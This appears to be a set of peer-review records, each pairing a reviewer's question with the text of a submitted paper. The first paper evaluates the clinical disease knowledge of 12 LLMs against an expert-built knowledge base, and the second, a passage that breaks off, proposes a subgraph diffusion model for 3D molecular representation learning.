gYcft1HIaU
Would it be considered a correct hit if the model predicts 'GI tract' instead of 'digestive system' in the examples from Table 3? What kind of standardization was performed in evaluating LLMs response with the experts output?
DO CURRENT LARGE LANGUAGE MODELS MASTER ADEQUATE CLINICAL KNOWLEDGE? Anonymous authors Paper under double-blind review ABSTRACT Large Language Models (LLMs) show promising potential in solving clinical problems. Current LLMs, including so-called medical LLMs, are reported to achieve excellent performance on certain medical evaluation benchmarks, such as medical question answering, medical exams, etc. However, such evaluations cannot assess whether LLMs have mastered sufficient, compressive, and necessary medical knowledge for solving real clinical problems, such as clinical diagnostic assistance. In this paper, we propose a framework to assess the mastery of LLMs in clinical knowledge. Firstly, we construct a large medical disease-based knowledge base, MedDisK, covering 10,632 common diseases across 18 clinical knowledge aspects, which are crucial for diagnosing and treating diseases. Built on that, we propose a MedDisK-based evaluation method MedDisKEval: We prompt LLMs to retrieve information related to these clinical knowledge aspects. Then, we evaluate an LLM’s mastery of medical knowledge by measuring the similarity between the LLM-generated information and the content within our knowledge base. Our experimental findings reveal that over 50% of the clinical information generated by our evaluated LLMs is significantly inconsistent with the corresponding knowledge stored in our knowledge base. We further perform a significance analysis to compare the performance of medical LLMs with their backbone models, discovering that 5 out of 6 medical LLMs perform less effectively than their backbone models in over half of the clinical knowledge aspects. These observations demonstrate that existing LLMs have not mastered adequate knowledge for clinical practice. Our findings offer novel and constructive insights for the advancement of medical LLMs. 1 INTRODUCTION In recent years, advancements in Large Language Models (LLMs) have shown potential across various domains, including the medical domain. Several foundation LLMs like ChatGPT (Ouyang et al., 2022) and LLaMa (Touvron et al., 2023) have been noted for their outstanding performance on various medical evaluation benchmarks, including USMLE (United States Medical Licensing Examination) (Kung et al., 2023), the medical section of MMLU (Hendrycks et al., 2020), MedQA (Jin et al., 2021), and PubMedQA (Jin et al., 2019). However, direct application of general-purpose LLMs to the medical domain may not be suitable due to their lack of specialized training on medical corpora and potential deficits in professional expertise within the medical field. To address this gap, researchers have proposed several LLMs (Li et al., 2023; Wang et al., 2023; Chen et al., 2023; Zhang et al., 2023; Xiong et al., 2023; Singhal et al., 2023a) tailored for medical applications, known as “medical LLMs”. Some of these models are claimed to outperform general LLMs like ChatGPT in specific medical tasks, such as medical dialogues and medical question answering. However, does the excellent performance achieved in these medical benchmarks and tasks indicate that current LLMs, including general and medical ones, master adequate knowledge for solving real clinical problems? To answer this question, we need to take a throughout look at existing medical evaluation benchmarks. The existing medical evaluation benchmarks are predominantly based on question-answering (QA) tasks. These benchmarks collect questions from diverse sources, including medical examinations, electronic health records, online resources, and expert crafting. While these QA-based evaluation benchmarks are effective for assessing LLM performance, they cannot answer whether LLMs have mastered sufficient medical knowledge for solving real clinical problems. This is because current QA-based medical evaluation datasets cover only some common diseases and lack extensive coverage of knowledge across various aspects of diseases. Therefore, the performance of LLMs on these medical QA datasets cannot accurately reflect the extent to which they cover knowledge about different diseases and various knowledge aspects of diseases. Moreover, answering questions involves three distinct skills: understanding the question, mastering the relevant knowledge, and applying that knowledge for reasoning. Therefore, the performance of LLMs on QA datasets is jointly determined by these three skills and does not directly reflect their mastery of clinical knowledge. Furthermore, some of these benchmarks are available online and may be inadvertently included into the training sets of some LLMs by web crawlers or similar tools used by LLMs developers. Such data leakage may lead to unfair comparisons. To address these shortcomings, we present in this paper a novel framework to probe whether LLMs have mastered comprehensive medical knowledge for real clinical challenges. Figure 1 presents an overview of this framework. To begin, we construct a large-scale medical disease-based knowledge base MedDisK, encompassing 10,632 common diseases and 18 clinical knowledge aspects necessary for diagnosing and treating diseases, such as primary symptoms, surgical procedures, and medications. Built on that, we propose a MedDisK-based evaluation method MedDisKEval: LLMs are first prompted to recall information of the knowledge aspects defined in our knowledge base, such as “the primary symptoms of virus URI are ...” and “the anatomy parts of diabetes are ...”. The LLM’s mastery of clinical knowledge is then probed by measuring the similarity between the LLM-generated disease information and the content within our knowledge base. We perform the proposed evaluation on a total of 12 general and medical LLMs. Our experimental results indicate that, more than 50% of the disease-related information generated by all the evaluated LLMs exhibit significant inconsistencies with the content from our knowledge base (See Figure 4). The experimental results answer our question in the first paragraph: None of the current LLMs have yet mastered adequate clinical knowledge. Additionally, we observe that 5 out of 6 medical LLMs achieve inferior performance compared to their backbone models in over half of the clinical knowledge aspects. The results imply that the training methods applied in current medical LLMs may not consistently enhance the mastery of clinical knowledge and could potentially result in catastrophic forgetting in some knowledge aspects. To ensure the timeliness of this evaluation framework while guarding against data leaks, we will not release the complete medical knowledge base. Nevertheless, we will make data samples and an evaluation interface available at [URL to be released] to promote further research. Our contributions are summarized as follows: - We propose a large-scale medical disease-based knowledge base MedDisK, covering 10,632 common diseases and 18 clinical knowledge aspects that are crucial for diagnosing and treating diseases. - Built on that, we introduce a MedDisK-based evaluation method MedDisKEval to probe LLMs’ mastery of clinical knowledge. Employing the proposed clinical knowledge base, we conduct an extensive evaluation of 12 LLMs to assess their clinical knowledge mastery. Our experimental results demonstrate that none of the evaluated LLMs have mastered sufficient knowledge to handle real clinical problems effectively. Further analysis indicates that most of the current medical LLMs do not significantly surpass their backbone models in medical knowledge mastery. 2 RELATED WORKS Medical Large Language Models Current medical LLMs can be divided into two categories. One category supervises finetunes general backbone models with medical question answering (Singhal et al., 2023b), multi-turn medical dialogue (Zhang et al., 2023; Chen et al., 2023), data generated by LLMs (Wang et al., 2023; Li et al., 2023; Xiong et al., 2023) or a hybrid of general and medical data (OpenMEDLab, 2023). The other category, represented by PMC-LLaMA (Wu et al., 2023), conducts further pretraining on medical corpora. We primarily evaluate LLMs in the first category since only a few models are in the second category. Moreover, our evaluation is based on a Chinese clinical knowledge base, and current models in the second category present poor Chinese language capabilities in our preliminary experiments. Medical Evaluation Benchmarks Existing medical LLMs are evaluated with question-answering (QA) tasks, including multi-choice QA (Jin et al., 2021; 2019) and open-ended QA (Singhal et al., 2023a; He et al., 2019). Though QA tasks are demonstrated as effective tools to evaluate LLMs’ capabilities, they have limitations in measuring LLMs’ medical knowledge mastery. Therefore, we propose a disease-knowledge-based evaluation that probes LLMs’ proficiency in clinical knowledge. When scoring open-ended QA, automated metrics (Papineni et al., 2002; Lin, 2004; Zhang et al., 2019) are widely used but may not align well with human judgments. LLMs (OpenMEDLab, 2023) or human experts (Singhal et al., 2023b) are also employed, though incurring significant costs for comprehensive assessments. Therefore, we introduce a low-cost, expert-aligned automated scoring method to produce scores consistent with expert assessment. Knowledge-graph-based Language Model Evaluation Some prior studies (Petroni et al., 2019; Sung et al., 2021) assess language models like BERT (Devlin et al., 2018) and BioBERT (Lee et al., 2020) by completing triples in knowledge graphs. While these studies probe LMs’ knowledge in the general and biomedical domains, we focus on probing larger LMs in the clinical domain. We employ a large-scale clinical knowledge base including 10,632 diseases across 18 attributes to evaluate the clinical knowledge mastery of 12 LLMs. 3 METHODS In this section, we present the framework to assess whether LLMs have mastered comprehensive medical knowledge for real clinical diagnosis and medical decisions, by first introducing a large-scale medical disease-based knowledge base MedDisK in Section 3.1 and then the MedDisK-based evaluation method MedDisKEval in Section 3.2. 3.1 MedDisK: LARGE-SCALE MEDICAL DISEASE-BASED KNOWLEDGE BASE As we know, disease-based clinical knowledge is of utmost importance and crucial for making accurate clinical diagnoses, conducting appropriate examinations, implementing effective treatments, and other medical decision-making. Therefore, we construct a large-scale medical disease-based knowledge base MedDisK to evaluate LLMs. To make the evaluation effective, the MedDisK must require the following properties: (1) including large-scale common diseases; (2) involving rich disease-based knowledge; (3) accurate and inaccessible publicly (avoiding implicit leaks leading to internal testing). To address the above issues, we employ an ICD10-based method to construct MedDisK as presented in Figure 2. ICD10 was developed by the World Health Organization (WHO), including almost all diagnosis diseases and related health problems. We first select a subset from the ICD10 database according to whether the diseases are common in clinical (determined by clinical experts) and are statistically frequent in EHR (Electronic Health Record), resulting in 10,632 common diseases. Then, we employ clinical experts to define 18 disease-based clinical knowledge aspects (in Table 1) that are crucial to medical decision-making (diagnoses, examinations, treatments). Finally, the MedDisK, including 10,632 common diseases and their corresponding 18 aspects of clinical knowledge, are constructed with a collaborative effort between clinical experts and machine assistance. The annotation by clinical experts ensures the accuracy, professionalism, and completeness of knowledge in MedDisK. The whole process involved the dedicated efforts of 20 clinical experts over about 10 months. More details of MedDisK construction and comparison with existing QA evaluation datasets are provided in Appendix A. ### 3.2 MedDisKEval: Disease-Knowledge-based LLMs Evaluation #### 3.2.1 Disease-Oriented Clinical Knowledge Retrieval We employ different prompting strategies for different categories of LLMs to extract disease-related information from each clinical knowledge aspect individually. For pretraining-only models (not fine-tuned on specific instructions), we apply the few-shot learning strategy utilized in existing benchmarks, such as MMLU, by generating prompts with five demonstrative examples. We have discovered in experiments that five examples suffice to activate the few-shot capability of LLMs. For models finetuned on instructions, we collaborate closely with clinical experts to craft tailored instructions for each knowledge aspect. These instructions are added before the few-shot examples, acknowledging that these models may achieve suboptimal performance without instructions. Each instruction is designed to introduce the relevant knowledge aspect and guide the format of LLMs’ output accordingly, undergoing multiple iterations to achieve optimal generation results. We provide prompt examples and all the instructions in Appendix B and C respectively. After the generation, we post-process LLM responses to remove noise and format them according to three types of clinical knowledge aspects: 1. enumerated type (a list of entities); 2. declarative type (unstructured text); 3. numeric type. We first apply heuristic rules to extract related segments and filter out irrelevant content in LLMs’ responses. Afterward, we leverage various methods to format responses for different types of knowledge aspects. For the enumerated type, we employ a specialized NER model to identify and extract medical entities from the text. In cases involving the numeric type, we extract the initial number within the text and return NaN if no number is found. We do not format responses of the declarative type as they inherently assume a textual form. We denote each piece of post-processed information as a triplet \((d, a, r)\), where \(d\) is the corresponding disease, \(a\) is the involved clinical knowledge aspect, and \(r\) is LLM’s post-processed information. We provide more details of the post-processing and the NER model in Appendix D and E. ### 3.2.2 Expert-Aligned Knowledge Scoring The proposed expert-aligned knowledge scoring process includes two steps: **disease-knowledge-based automated scoring** that assess the similarity between LLM-generated information and the content within our knowledge base using automated metrics, and **expert-aligned grading** that aligns the automated scores with expert assessment, yielding results that are more easily interpretable. **Disease-Knowledge-based Automated Scoring** We employ automated evaluation metrics to measure the similarity between LLM-generated information and the content within our knowledge base. Firstly, for each piece of LLM-generated information \((d, a, r)\), we retrieve the corresponding triplet \((d, a, \hat{r})\) from our knowledge base. Then, the similarity is calculated as \(s = \text{sim}(r, \hat{r})\), where \(\text{sim}\) refers to an evaluation metric that varies according to the type of knowledge aspect \(a\). For the declarative type, we apply both token-level metrics, such as BLEU-1 (Papineni et al., 2002) and ROUGE-1 (Lin, 2004) (f1-score), and a sentence-level metric cosine similarity based on a Chinese text embedding model M3E (Wang Yuxin, 2023). We have explored alternative metrics like BERTScore (Zhang et al., 2019) but found that the computed scores achieve lower consistency with expert assessment (See Appendix F). When dealing with the enumerated type, considering computational complexity, we adopt a straightforward approach by concatenating entities with blank spaces and applying the same metrics for declarative types. In the case of the numeric type, we evaluate it using the hard match score \(1_{r=\hat{r}}\), as our knowledge base includes only one numerical aspect (Severity Level), where distinct numbers correspond to different categories. **Expert-aligned Grading** The disease-knowledge-based automated scoring method offers objective but less interpretable scores that reveal clinical knowledge mastery. The scores are not inherently aligned with the subjective assessments of clinical experts. Furthermore, variations in the types of knowledge aspects can introduce disparities in score distributions, thus constraining comprehensive analysis across different aspects. As a solution, we develop an expert-aligned grading approach to categorize consistency scores into distinct levels, facilitating interpretable comparisons and cross-aspect analysis. The grading process is illustrated in Figure 3. We first conduct interval sampling on all the scoring results across LLMs. Subsequently, we engage clinical experts to categorize LLM’s responses into multiple tiers aligned with their subjective cognition and determine the optimal grading standard (score thresholds) that divide the results into these tiers: | Metrics | Correlation With Clinical Experts | |------------------|-----------------------------------| | BLEU-1 | 0.722* | | ROUGE-1 | 0.779* | | Cosine Similarity| 0.805* | | Average | 0.837* | Table 2: Consistency between the results of MedDisKEval and clinical experts across metrics, measured by Spearman correlation coefficients. Asterisks indicate the correlations are significant. Figure 3: Expert-Aligned Knowledge Scoring • **Completely Wrong**: the LLM-generated information \( r \) has a significant inconsistency or conflict with the ground truth \( \hat{r} \), or even irrelevant to the aspect \( a \). • **Partially Correct**: the LLM-generated information \( r \) contains some accurate information mentioned in \( \hat{r} \) but may also include some incorrect or incomplete information. • **Basically Correct**: the LLM-generated information \( r \) is mostly in agreement with the ground truth \( \hat{r} \). There might be minor errors or incompleteness, but the consistency is high. Specifically, we determine a grading standard for each combination of metrics (ROUGE-1, BLEU-1, and cosine similarity) and types (enumerated and declarative). In each combination, we set a score interval of 0.1 and sample 10 examples from each interval, where each example consists of \( d, a, r, \hat{r}, \) and a similarity score \( s \). For the numeric type, such as Severity Level, in our case, we directly map the score 1 to 'Basically Correct' and the score 0 to 'Completely Wrong,' as it has only two possible values. Ultimately, the clinical knowledge mastery of an LLM can be reflected by the proportion of LLM-generated information in these three tiers. More details are presented in Appendix G. To validate the alignment between the proposed expert-aligned automated grading and expert evaluation, we assign clinical experts to annotate another 150 randomly selected instances. Each instance includes a disease \( d \), a knowledge aspect \( a \), information from an LLM (\( r \)), and \( \hat{r} \) from our knowledge base. The tiers "Completely Wrong," "Partially Correct," and "Basically Correct" are mapped to respective scores of 0, 1, and 2. We employ Spearman correlation coefficients to measure the consistency and summarize results in Table 2. All three metrics achieve correlation coefficients surpassing 0.7, indicating the high consistency between the proposed automated grading and the expert assessment. Cosine similarity correlates more strongly with expert assessments than the other two metrics. However, we find that the average scores of all three metrics after grading achieve stronger correlation than any single metric (Table 2), indicating that these three metrics can complement each other in our evaluation. Therefore, we use all these metrics for a comprehensive evaluation. 4 EVALUATION 4.1 EVALUATED LLMs As mentioned above, we evaluate two types of LLMs in our experiments: (1) LLMs that are pretrained and finetuned in general domain: GPT-3.5-turbo (Ouyang et al., 2022), Bloomz-7.1B-mt (Muennighoff et al., 2023), LLaMa-7B (Touvron et al., 2023), Vicuna-7B (Zheng et al., 2023), ChatGLM-6B (Du et al., 2022), and Baichuan-7B (Yang et al., 2023); (2) LLMs that are further finetuned on medical data: ChatDoctor (Li et al., 2023), DoctorGLM (Xiong et al., 2023), BenTao (huatuo-llama-med-chinese) (Wang et al., 2023), HuatuoGPT (Zhang et al., 2023), BianQue-2 (Chen et al., 2023), and PULSE (OpenMEDLab, 2023). These LLMs are selected based on a comprehensive consideration of computational power, evaluation cost, and model availability. To ensure a fair comparison, we maintain the text generation parameters of LLMs as default in their respective GitHub or HuggingFace repositories. 4.2 RESULTS 4.2.1 OVERALL PERFORMANCE The upper part of Figure 4 depicts the distribution of all LLMs’ responses across the three metrics within the three tiers defined in Section 3.2.2. These three sub-figures reveal the overall performance of current LLMs on clinical knowledge mastery. Our findings point to a striking revelation: The experimental results reveal that over 50% of responses generated by current LLMs are classified as "Completely Wrong," approximately 30% fall under the category of "Partially Correct," and merely fewer than 20% are deemed "Basically Correct." These results show that the clinical knowledge mastery of existing LLMs is far from adequate to address real-world clinical challenges. The distribution of the three metrics exhibits similar trends while varying in detailed proportions, highlighting the importance of utilizing multiple metrics in our evaluation. We provide some examples of LLMs’ responses within three tiers in Table 3. The degree of clinical knowledge mastery shown in these LLM responses closely corresponds with the tiers assigned by our method. Figure 4: Upper: Distribution of LLMs’ responses across three metrics. Lower: Distribution of responses across 12 LLMs and three metrics. We denote Bloomz-7.1B-mt as Bloomz-7B for name consistency with other models. Models with the same backbone model are illustrated with similar colors. We use slashes to denote the base models within each model series. | Tier | Disease | Knowledge Aspect | Ground Truth | LLM Response | |--------------------|----------------------------------------------|------------------|---------------------------------------|--------------| | Completely Wrong | rheumatoid arthritis of the hand interphalangeal joints | patient population | higher prevalence in females; middle-age; elderly | ok, I see. | | Partially Correct | tracheobronchial amyloidosis | affected sites | trachea; bronchi; lung | lung; chest | | Basically Correct | esophageal abscess | affected body systems | digestive system | digestive system | Table 3: Examples of LLMs’ responses within three tiers defined in Section 3.2.2 4.2.2 DETAILED COMPARISON ACROSS LLMs We further investigate the clinical knowledge mastery across different LLMs by examining the distribution of different LLM’s responses across three tiers, which is showcased in the lower part of Figure 4. See Appendix H for another comparison across knowledge aspects. Across all evaluated LLMs and metrics, over 40% of the clinical information generated by each LLM exhibits significant inconsistencies or conflicts with the knowledge stored in our knowledge base. This indicates that the insufficient medical knowledge mastery of existing LLMs, as demonstrated in Section 4.2.1, is not caused by a few models but is a widespread phenomenon of current LLMs. Moreover, we consider a group of LLMs using the same backbone model as an LLM series and compare the medical knowledge mastery between different series that share a similar number of parameters (excluding ChatGPT). The general order is as follows: Baichuan-7B series holds the first position, ChatGLM-6B series takes the second place, and LLaMA-7B and Bloomz-7B series share the third place. Remarkably, GPT-3.5-turbo (ChatGPT) stands out by achieving the highest proportion of “Basically Correct” and the lowest proportion of “Completely Wrong,” surpassing all other LLMs in terms of clinical knowledge mastery. Additionally, ChatGPT achieves a higher “Basically Correct” proportion than “Partially Correct” in 2 out of 3 metrics, indicating that ChatGPT exhibits lower hallucination and tends to avoid responding when faced with uncertain knowledge. For a straightforward assessment of the clinical knowledge mastery in these LLMs, we begin by averaging the distributions of the three metrics for each LLM. Then, we perform a weighted summation across the three tiers, assigning scores of 0, 5, and 10 to “Completely Wrong,” “Partially Correct,” and “Basically Correct,” respectively, to yield a total score for each LLM. It is worth noting that this score is equivalent to the average score in Table 2, that achieves high consistency with expert assessment. Subsequently, we categorize LLMs into four levels based on these total scores. The scoring process and outcomes are detailed in Figure 5 and Table 4 respectively. Surprisingly, it is evident that none of the top three models have received specialized training on medical corpora, and most medical LLMs are placed in Level 3. Additionally, models sharing the same base architecture tend to attain similar scores (e.g., LLaMA, ChatDoctor, and BenTsao; ChatGLM, DoctorGLM, and BianQue-2), although a few exceptions exist (Vicuna, PULSE). These findings suggest that most current medical LLMs perform not significantly different from their backbone models. ### 4.2.3 Medical LLMs Versus Their Backbone Models To investigate the effect of continual training on medical corpora, we further conducted a significance analysis comparing each medical LLM with its corresponding backbone model. We employed Welch’s T-test to assess six model pairs across all 18 aspects of disease knowledge, utilizing the cosine similarity for analysis. The results of the T-test utilizing other metrics (ROUGE-1, BLEU-1) show similar trends and can be found in Appendix I. The findings are presented in Table 5. Within this table, the t-statistics reveal disparities in performance between medical LLMs and their backbone models across various knowledge aspects. Asterisks’ presence denotes statistical significance (p-value < 0.05). Green cells in the table signify superior performance by the medical LLM compared with its backbone model on the respective aspect, red cells indicate poorer performance, while white cells suggest no significance. The experimental results reveal that 5 out of 6 medical LLMs underperform significantly compared to their base models in over half of the clinical knowledge aspects. PULSE stands out as the sole model achieving significant improvements on almost all evaluated aspects except the Severity Level. The significant improvement attained by the PULSE model can be attributed to its finetuning on approximately 4,000,000 instructions from both the Chinese medical field and the general domain. However, this significant improvement may also be affected by the low performance of its backbone model, Bloomz-7.1B-mt, on the proposed evaluation benchmark (see Figure 4). Medical LLMs typically excel in certain aspects, such as Patient Population and Departments, but exhibit subpar performance in other areas, such as Anatomical Sites and Secondary Diseases. In summary, the results imply that most of the current medical LLMs do not achieve consistent enhancement in the clinical knowledge mastery across all knowledge aspects compared to their backbone models, even potentially resulting in catastrophic forgetting in some aspects. ## 5 Discussion **Medical Capabilities of Current LLMs** Large Language Models cannot be widely employed in real clinical tasks unless they master adequate clinical knowledge, exceptional medical compre- --- **Table 4:** The ranking of evaluated LLMs based on total scores computed by the method presented in Figure 5, classified into four levels. | Model | Type | Completely Wrong | Partially Correct | Basically Correct | Total Score | Level | |----------------|--------|------------------|-------------------|-------------------|-------------|-------| | GPT-3.5 Turbo | General| 46.1% | 27.7% | 26.1% | 4.00 | 1 | | Vicuna-7B | General| 54.2% | 28.9% | 17.3% | 3.14 | | | Baichuan-7B | General| 54.4% | 29.3% | 16.3% | 3.10 | | | HuatuoGPT-7B | Medical| 52.1% | 35.5% | 12.4% | 3.02 | 2 | | PULSE-7B | Medical| 55.2% | 29.8% | 15.1% | 3.00 | | | DoctorGLM-6B | Medical| 60.7% | 23.6% | 15.7% | 2.75 | | | ChatGLM-6B | General| 58.0% | 29.8% | 12.1% | 2.70 | | | BianQue2-6B | Medical| 63.1% | 25.6% | 11.4% | 2.41 | | | LLaMA-7B | General| 67.2% | 18.3% | 14.4% | 2.36 | 3 | | ChatDoctor-7B | Medical| 65.5% | 23.9% | 10.6% | 2.26 | | | BenTsao-7B | Medical| 68.3% | 19.4% | 12.2% | 2.20 | | | BLOOMZ-7B | General| 68.7% | 25.9% | 5.5% | 1.84 | 4 | --- **Figure 5:** Calculating total scores with the distribution on three tiers. | Backbone Models | ChatGLM-6B | Bloomz-7B | Baichuan-7B | LLaMA-7B | |-----------------|------------|-----------|-------------|----------| | Medical LLMs | BianQue-2 | DoctorGLM | PULSE | HuatuoGpt| | Patient Population | 15.0* | 36.7* | 27.0* | 40.2* | | Prevalence Ages | 29.1* | 63.7* | 3.7* | -23.0* | | Onset Ages | 68.0* | 173.1* | 17.9* | -112.2* | | Primary Symptoms | -23.8* | -38.8* | 87.4* | 14.9* | | Associated Symptoms | 2.8* | -7.4* | 13.6* | -2.1* | | Differential Symptoms | -38.0* | -26.0* | 28.0* | 9.8* | | Physical Examination | -53.8* | -14.5* | 13.8* | -29.6* | | Anatomical Sites | -55.0* | -16.0* | 83.9* | -41.2* | | Affected Sites | -41.8* | -11.6* | 56.0* | -29.3* | | Affected Body Systems | -76.9* | -62.7* | 38.1* | 20.9* | | Treatment Principles | 2.6* | 11.7* | 15.8* | 2.2* | | Secondary Diseases | -13.1* | -45.8* | 22.9* | -28.4* | | Medications | 11.9* | 4.9* | 21.1* | -17.7* | | Surgical Procedures | -8.3* | -4.7* | 12.8* | -5.4* | | Auxiliary Examinations | -35.1* | -9.7* | 9.4* | -27.7* | | Laboratory Examinations | -30.6* | -12.9* | 25.1* | -10.4* | | Departments | 4.4* | 5.0* | 106.6* | -12.4* | | Severity Level | 17.9* | -18.5* | -41.3* | 43.3* | Table 5: The results of Welch’s T-test between each medical LLM and its backbone model across different aspects of diseases. The cosine similarities are applied in this analysis. hension, and strong reasoning capabilities. Among these capabilities, sufficient clinical knowledge forms the foundation for the other two. Nevertheless, our experimental results demonstrate that all current LLMs are far from mastering adequate clinical knowledge. Performance of Current Medical LLMs Though several medical LLMs are claimed to perform better than their backbone models on medical evaluation benchmarks, our evaluation results indicate that they do not achieve consistent improvement in all clinical knowledge aspects, even degrading severely in some aspects. Moreover, these medical LLMs achieve inferior performance than some general LLMs with a similar number of parameters, such as Baichuan-7B and Vicuna-7B. Several factors may contribute to this phenomenon: 1. These medical LLMs have not undergone extensive pretraining on medical corpora; 2. Certain medical LLMs are trained for limited medical tasks and lack comprehensive training on diverse medical tasks; 3. The performance of a few medical LLMs may be inflated due to potential data leakage. Future Works Medical LLMs have to master sufficient clinical knowledge first to become a foundation model in the medical domain. Our experiments on current medical LLMs indicate that small-scale finetuning on a limited set of medical tasks cannot inject adequate clinical knowledge into LLMs. Large-scale pretraining on medical corpora and supervised finetuning across various medical tasks may offer promising ways for training foundational models in the medical domain. 6 CONCLUSION We present in this paper an evaluation framework to assess the clinical knowledge mastery of LLMs. Firstly, we construct a large-scale Chinese medical disease-based knowledge base MedDisK, covering 10,632 common diseases and 18 clinical knowledge aspects that are essential in clinical practice. Built on that, we introduce a MedDisK-based evaluation method MedDisKEval, utilizing the proposed clinical knowledge base to study the medical knowledge mastery of 12 general and medical LLMs. Our experimental results reveal that current LLMs have not mastered adequate clinical knowledge, indicating that they are not well prepared to serve as foundation models in the medical domain. A further in-depth study reveals that most current medical LLMs have not performed significantly better than their backbone models. In the future, we will continue maintaining the knowledge base we have introduced to ensure its accuracy and professionalism and support more languages to facilitate the research of this field. REFERENCES Yirong Chen, Zhenyu Wang, Xiaofen Xing, Zhipei Xu, Kai Fang, Sihang Li, Junhong Wang, and Xiangmin Xu. Bianque-1.0: Improving the "question" ability of medical chat model through finetuning with hybrid instructions and multi-turn doctor qa datasets. 2023. URL https://github.com/scutcyr/BianQue. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. Bert: Pre-training of deep bidirectional transformers for language understanding. arXiv preprint arXiv:1810.04805, 2018. Zhengxiao Du, Yujie Qian, Xiao Liu, Ming Ding, Jiezhang Qiu, Zhilin Yang, and Jie Tang. Glm: General language model pretraining with autoregressive blank infilling. In Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 320–335, 2022. Junqing He, Mingming Fu, and Manshu Tu. Applying deep matching networks to chinese medical question answering: A study and a dataset. BMC Medical Informatics and Decision Making, 19(2):52, 2019. doi: 10.1186/s12911-019-0761-8. Dan Hendrycks, Collin Burns, Steven Basart, Andy Zou, Mantas Mazeika, Dawn Song, and Jacob Steinhardt. Measuring massive multitask language understanding. In International Conference on Learning Representations, 2020. Di Jin, Eileen Pan, Nassim Oufattole, Wei-Hung Weng, Hanyi Fang, and Peter Szolovits. What disease does this patient have? a large-scale open domain question answering dataset from medical exams. Applied Sciences, 11(14):6421, 2021. Qiao Jin, Bhuwan Dhingra, Zhengping Liu, William Cohen, and Xinghua Lu. PubMedQA: A dataset for biomedical research question answering. In Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing and the 9th International Joint Conference on Natural Language Processing (EMNLP-IJCNLP), pp. 2567–2577, Hong Kong, China, November 2019. Association for Computational Linguistics. doi: 10.18653/v1/D19-1259. URL https://aclanthology.org/D19-1259. Zeljko Kraljevic, Thomas Searle, Anthony Shek, Lukasz Roguski, Kawsar Noor, Daniel Bean, Aurelie Mascio, Leilei Zhu, Amos A Folarin, Angus Roberts, et al. Multi-domain clinical natural language processing with medcat: the medical concept annotation toolkit. Artificial intelligence in medicine, 117:102083, 2021. Tiffany H Kung, Morgan Cheatham, Arielle Medenilla, Czarina Sillos, Lorie De Leon, Camille Elepano, Maria Madriaga, Rimel Aggabao, Giezel Diaz-Candido, James Maningo, et al. Performance of chatgpt on usmle: Potential for ai-assisted medical education using large language models. PLoS digital health, 2(2):e0000198, 2023. Jinyuk Lee, Wonjin Yoon, Sungdong Kim, Donghyeon Kim, Sunkyu Kim, Chan Ho So, and Jae-woo Kang. Biobert: a pre-trained biomedical language representation model for biomedical text mining. Bioinformatics, 36(4):1234–1240, 2020. Yunxiang Li, Zihan Li, Kai Zhang, Ruilong Dan, Steve Jiang, and You Zhang. Chatdoctor: A medical chat model fine-tuned on a large language model meta-ai (llama) using medical domain knowledge. Cureus, 15(6), 2023. Chin-Yew Lin. ROUGE: A package for automatic evaluation of summaries. In Text Summarization Branches Out, pp. 74–81, Barcelona, Spain, July 2004. Association for Computational Linguistics. URL https://aclanthology.org/W04-1013. Niklas Muennighoff, Thomas Wang, Lintang Sutawika, Adam Roberts, Stella Biderman, Teven Le Scao, M Saiful Bari, Sheng Shen, Zheng Xin Yong, Hailey Schoelkopf, Xiangru Tang, Dragomir Radev, Alham Fikri Aji, Khalid Almubarak, Samuel Albanie, Zaid Alyafeai, Albert Webson, Edward Raff, and Colin Raffel. Crosslingual generalization through multitask finetuning. In Proceedings of the 61st Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 15991–16111, Toronto, Canada, July 2023. Association for Computational Linguistics. doi: 10.18653/v1/2023.acl-long.891. URL https://aclanthology.org/2023.acl-long.891.
9g8h5HwZMy
Incorporating a well-designed prior distribution could also reduce the challenging learning task, e.g., [EigenFold](https://arxiv.org/abs/2304.02198). The model should be able to figure out the correlation between data dimensions during training. Would this be more effective and easier to learn than introducing masks for the diffusion process?
Subgraph Diffusion for 3D Molecular Representation Learning: Combining Continuous and Discrete Anonymous authors Paper under double-blind review Abstract Molecular representation learning has shown great success in AI-based drug discovery. The 3D geometric structure contains crucial information about the underlying energy function, related to the physical and chemical properties. Recently, denoising diffusion probabilistic models have achieved impressive results in molecular conformation generation. However, the knowledge of pre-trained diffusion models has not been fully exploited in molecular representation learning. In this paper, we study the ability of representation learning inherent in the diffusion model for conformation generation. We introduce a new general diffusion model framework called MaskedDiff for molecular representation learning. Instead of adding noise to atoms like conventional diffusion models, MaskedDiff uses a discrete distribution to select a subset of the atoms to add continuous Gaussian noise at each step during the forward process. Further, we develop a novel subgraph diffusion model termed SubgDiff for enhancing the perception of molecular substructure in the denoising network (noise predictor), by incorporating auxiliary subgraph predictors during training. Experiments on molecular conformation generation and 3D molecular property predictions demonstrate the superior performance of our approach. 1 Introduction Molecular representation learning (MRL) has attracted tremendous attention due to its significant role in learning from limited labeled data for applications like AI-based drug discovery (Shen & Nicolaou, 2019) and material science (Police et al., 2021). From a physical chemistry perspective, the 3D molecular conformation can largely determine the properties of molecules and the activities of drugs (Cruz-Cabeza & Bernstein, 2014). Thus, numerous geometric neural network architectures and self-supervised learning strategies have been proposed to explore 3D molecular structures to improve performance on downstream molecular property prediction tasks (Schütt et al., 2017; Zaidi et al., 2023; Liu et al., 2023a). Meanwhile, diffusion probabilistic models (DPM) have shown remarkable power to generate realistic samples, especially in synthesizing high-quality images and videos (Sohl-Dickstein et al., 2015; Ho et al., 2020). By modeling the generation as a reverse diffusion process, DPMs transform a random noise into a sample in the target distribution. Recently, diffusion models have demonstrated strong capabilities of molecular 3D conformation generation (Xu et al., 2022; Jing et al., 2022). The training process of a DPM for conformation generation can be viewed as the reconstruction of the original conformation from a noisy version, where the noise is modulated by different time steps. Consequently, the denoising objective in the diffusion model can naturally be used as a self-supervised representation learning technique (Pan et al., 2023). Inspired by this intuition, several works have used this technique for molecule pretraining (Liu et al., 2023b; Zaidi et al., 2023). Figure 1: Equilibrium probability of the six ibuprofen conformers c1–c6 in four different conditions. The 3D substructure is a significant characteristic of a molecule. siderable progress, the potential of DPMs for molecular representation learning has not been fully exploited. In this paper, we intend to explore the potential of generative DPM for MRL. To this aim, we raise the question: Can we effectively enhance the perception of 3D molecular structures with the denoising network (noise predictor) of DPM? If yes, how to achieve it? To answer this question, we first analyze the gap between the current DPMs and the characteristics of molecular structures. Most 